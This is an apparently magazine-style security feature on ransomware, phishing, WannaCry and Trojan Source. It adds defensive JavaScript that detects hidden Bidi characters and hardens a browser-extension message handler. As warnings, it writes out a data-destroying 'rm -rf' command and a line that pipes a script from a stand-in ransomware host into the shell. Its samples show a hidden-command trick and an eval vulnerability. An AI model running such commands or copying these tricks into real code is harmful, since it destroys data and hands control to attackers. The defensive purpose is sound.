These days we’re never far from cybercrime-themed headlines. What was very much in the realms of sci-fi a couple of decades ago has become almost commonplace today.
In the past few years we’ve seen large-scale attacks against Ukraine’s power grid, Sony Pictures, the Colonial Pipeline, JBS SA (the world’s largest meat supplier) and South African shipping firm Transnet. Such attacks often aim to cause damage and disruption (the power grid attack left hundreds of thousands without power for hours). And sometimes the aim is political. For example, the Sony Pictures hack is widely believed to have originated from North Korea, with hackers demanding The Interview (a Kim Jong Un-themed comedy) be withdrawn. Which it was, although not before gigabytes of embarrassing emails and personal information on Sony Pictures staff were shared.
Latterly though, hackers are financially motivated. They want their targets to pay (usually in cryptocurrency), either to restore access to their systems, or to avoid sensitive information being publicised. The last three attacks mentioned above all occurred in 2021, and are examples of such ransomware attacks. Ransom demands can be high too: the Colonial Pipeline hackers received $10 million (most of which was recovered), and prolific (but now defunct) ransomware outfit REvil requested $70 million following a supply chain attack on managed software company Kaseya. Thanks to the ease with which fiat currency could be exchanged for Bitcoin, ransomware attacks launched against home users have proven profitable, too.
The tired old line “Linux doesn’t get viruses” (or ransomware, or whatever other kind of badware you might care to name) was never really true. Internet-facing Linux servers have long been a target for all kinds of mischief, and with so many Linux-powered Internet of Things devices joining the party, such intrusions are only going to increase.
Directed attacks against home users are waning, primarily because there are much more lucrative targets out there, but that’s no excuse for complacency. We’ll show you the modern threatscape, refresh some best practices and hopefully get your 2022 off to the safest start possible. So let’s get to it!
It’s bad and it’s getting worse. But running outdated versions of Windows doesn’t help anyone.
A few years back guilt-ware attacks were common. Unsuspecting users would log into their machines and be greeted with a banner stating they were under investigation for nebulous crimes: anything from piracy, to pornography, to the promulgation of terror materials. But don’t worry, says the warning – all of this will go away if you just wire some cryptocoins to this address.
The message goes on to explain how to acquire said coins, and warns that if you don’t pay, you’ll be arrested. That these kinds of attacks were ever successful (and sometimes still are) speaks volumes about people’s gullibility. It also shows some people have some quite funky ideas about how justice works. Yet we shouldn’t be so dismissive – there’s some psychology behind this.
There’s a widely held theory that everyone has some latent guilt about something they’ve done in the past and not ‘fessed up to. And tapping into this with a scary message can make the subject feel rumbled. Detectives take advantage of this (and all kinds of other techniques) when questioning suspects.
Still, it’s the kind of message that lots of people (especially anyone used to browsing the internet without a pop-up blocker), will just close and ignore. So later evolutions of this attack would go a stage further, either locking the victim out of the machine entirely (forcing the user to choose between a complete reinstall or a quick ransom payment) or encrypting any user documents it finds. This is what ransomware typically refers to today. Thanks to networking (and a rich underground scene in the trade of network exploits) damage may quickly spread to other machines too, and before you know it a stray click on a single machine might bring about a network-wide incident.
Naturally, businesses are a much more lucrative target with (according to Coveware) the average payout in 2020 being $233,817. Attacks on home users might ask for anywhere between the equivalent of $200 to $2,000, which is why they don’t tend to grab the headlines anymore. Home users may also feel uncomfortable about reporting a ransomware attack, but they shouldn’t. Even if the authorities can’t help, reporting the incident (to the likes of CISA in the US or the NCA in the UK) will at least help them measure the scale of the threat. For businesses, the projected cost of recovery might well exceed the ransom, at which point it makes business sense to cough up. Insurers are starting to recognise this now and some (controversially) even include ransomware payments in their policies.
HOW TO BECOME INFECTED
Unfortunately, most if not all ransomware outbreaks start with human error. This might be through social engineering, spear phishing campaigns (where high-profile individuals are targeted and tricked into handing over data with seemingly legitimate messages), rogue browser add-ons, dodgy websites, dodgy mobile apps, poisoned email attachments… the list goes on.
Sometimes human error upstream is to blame. For example, SIM-swapping attacks might involve tricking a customer service agent into porting a number to another SIM. This might then enable 2FA to be compromised on all of the accounts linked to that number. Whatever the method, once a human has erred, there’s not a lot even the most secure system in the world can do to remedy things.
The WannaCry outbreak in 2017, which nearly crippled the UK’s largely Windows 7-powered NHS, was a little different, since its spread was mostly as a result of a vulnerability in the SMB protocol. That vulnerability was actually known to NSA researchers, who named it EternalBlue. Unfortunately someone (perhaps a rogue contractor) made away with its details. And later, just before WannaCry hit, the vulnerability was published by a group calling themselves the ShadowBrokers. EternalBlue, which enables privileged code execution on remote systems, was also leveraged in the NotPetya ransomware outbreak, which disrupted global shipping.
Taking a few basic precautions is much easier than cleaning up a nasty digital infection
Basic internet hygiene is the single best defence for home users against ransomware, and malware in general. Unfortunately “the basics” encompasses many different areas these days that deserve their own cover features. Still, let’s at least try and summarise them here.
We hope you’re not the sort of person to click random links in suspect-looking emails. At the very least, hover over them (or copy and paste the link into a text document) to make sure they lead to a legitimate domain, and not something using deceptive characters like goog1e.com, or deceptive subdomains like google.domain.cm. Speaking of copying and pasting, be extra careful when doing so with code excerpts. Not only is there the risk that the command itself will do something bad, like rm -rf --no-preserve-root /, but thanks to the wonders of CSS and Unicode it’s easy to inject invisible characters that you won’t see until they’re pasted (and conceivably not even then). Just appending ; curl ransomware.xyz/pwn.sh | sh is one way to stop a benign command being so benign. Not a real URL, by the way. Bidirectional (Bidi) control characters have been used to obfuscate the file extensions of email-borne malware in the past.
Passing on the compromise
And now a more insidious form of this attack has been discovered, dubbed Trojan Source. It turns out that most compilers, while supporting and encouraging Unicode source files, don’t really have any mitigations against obfuscated Bidi additions. So a lazy developer might copy and paste a code snippet from Stack Overflow, then not only risk having their own compiler exploited, but if they then upload that code to a popular project, the whole well becomes poisoned. You can read about it at https://krebsonsecurity.com/2021/11/trojan-sourcebug-threatens-the-security-of-all-code. The scope of the attack is huge, because it enables essentially arbitrary, invisible code to be added. This might be keyloggers, ransomware or any number of other bad things.
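As an added example (not code from the article or from the Trojan Source researchers), here is a small JavaScript checker to run over a pasted command or a source file before using it. It reports every invisible Unicode format character and any Bidi control left unterminated at the end of a line, which is the Trojan Source signature; the sample strings are constructed for the demonstration.

```javascript
// Bidi opener -> the closer it must be paired with on the same line.
const BIDI_OPENERS = new Map([
  ["\u202A", "\u202C"], ["\u202B", "\u202C"], // LRE, RLE close with PDF
  ["\u202D", "\u202C"], ["\u202E", "\u202C"], // LRO, RLO close with PDF
  ["\u2066", "\u2069"], ["\u2067", "\u2069"], // LRI, RLI close with PDI
  ["\u2068", "\u2069"],                       // FSI closes with PDI
]);
const BIDI_CLOSERS = new Set(["\u202C", "\u2069"]);
const FORMAT_CHAR = /^\p{Cf}$/u; // Unicode "format" chars: bidi controls, ZWSP, ZWJ, BOM, soft hyphen...
const codepoint = (ch) => "U+" + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, "0");

// Returns one finding per suspicious character, plus one per bidi control that
// is still open when its line ends (the Trojan Source pattern).
function scanSnippet(text) {
  const findings = [];
  text.split("\n").forEach((line, idx) => {
    const lineNo = idx + 1;
    const open = []; // bidi controls opened on this line and not yet closed
    let col = 0;
    for (const ch of line) { // iterate by code point, not UTF-16 unit
      col += 1;
      const cp = codepoint(ch);
      if (BIDI_OPENERS.has(ch)) {
        open.push({ col, cp, closer: BIDI_OPENERS.get(ch) });
        findings.push({ lineNo, col, cp, reason: "bidi control" });
      } else if (BIDI_CLOSERS.has(ch)) {
        if (open.length && open[open.length - 1].closer === ch) open.pop();
        findings.push({ lineNo, col, cp, reason: "bidi control" });
      } else if (FORMAT_CHAR.test(ch)) {
        findings.push({ lineNo, col, cp, reason: "invisible format character" });
      }
    }
    for (const o of open) {
      findings.push({ lineNo, col: o.col, cp: o.cp, reason: "bidi control unterminated at end of line" });
    }
  });
  return findings;
}

const isSafeToPaste = (text) => scanSnippet(text).length === 0;

// Constructed samples for the demonstration (not taken from the article).
const CLEAN = "sudo apt update && sudo apt upgrade";
// An RLO after a normal command hides a second one; it is never closed, so the
// tail is displayed reversed and is easy to miss before pasting.
const HIDDEN = "sudo apt update\u202E; echo hidden";
// Commenting-out trick in the Trojan Source style: the condition appears to sit
// inside the comment, but the compiler sees it outside.
const TROJAN_SRC = "/* \u202E } \u2066if (isAdmin)\u2069 \u2066 begin admins only */\n    printf(\"admin\\n\");";
```

Modern GCC, Clang and rustc emit a warning for the same unterminated-control condition, so this is the check to run on text from sources they never see, such as a terminal paste.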
There are a number of other add-ons you might want to use to protect your privacy. But be aware that the Firefox add-ons repository and Chrome Web Store aren’t monitored for malicious code, so exercise caution when installing new add-ons. Even genuine add-ons can contain code that can be exploited, either by a rogue add-on or by a maliciously crafted web page. A study entitled DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale found 184 extensions that could be exploited this way. An unchecked eval call in a privileged extension might allow a web page to do anything that extension can, and a stray tabs.executeScript() call fed with untrusted input would likewise allow remote code inclusion.
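To make the eval problem concrete, here is an added example (not from the DoubleX paper or any real extension) of the message-handler pattern it flags, alongside a hardened version that verifies the sender and dispatches only allow-listed actions. The origin in TRUSTED_ORIGINS and the action names are placeholders.

```javascript
// The shape of the bug: a privileged background script evaluates a string
// that arrived from a web page, so the page inherits the extension's permissions.
function handleMessageVulnerable(msg) {
  return eval(msg.code); // page-controlled string run in the extension's context
}

// Hardened handler for the same chrome.runtime.onMessageExternal callback:
// check where the message came from, never execute strings, and only run
// allow-listed actions whose arguments are validated.
const TRUSTED_ORIGINS = new Set(["https://app.example"]); // placeholder origin

const ACTIONS = new Map([
  ["ping", () => ({ pong: true })],
  ["tabUrlAllowed", ({ url }) => {
    if (typeof url !== "string") throw new TypeError("url must be a string");
    const { protocol, hostname } = new URL(url);
    return { allowed: protocol === "https:" && TRUSTED_ORIGINS.has(`https://${hostname}`) };
  }],
]);

function handleMessageHardened(msg, sender) {
  let origin;
  try { origin = new URL(sender && sender.url).origin; } catch { return { ok: false, error: "bad sender" }; }
  if (!TRUSTED_ORIGINS.has(origin)) return { ok: false, error: "untrusted sender" };
  // A Map lookup, unlike a plain object, cannot be tricked with "constructor" or "__proto__".
  if (!msg || typeof msg.action !== "string" || !ACTIONS.has(msg.action)) return { ok: false, error: "unknown action" };
  try {
    return { ok: true, result: ACTIONS.get(msg.action)(msg.args || {}) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}
```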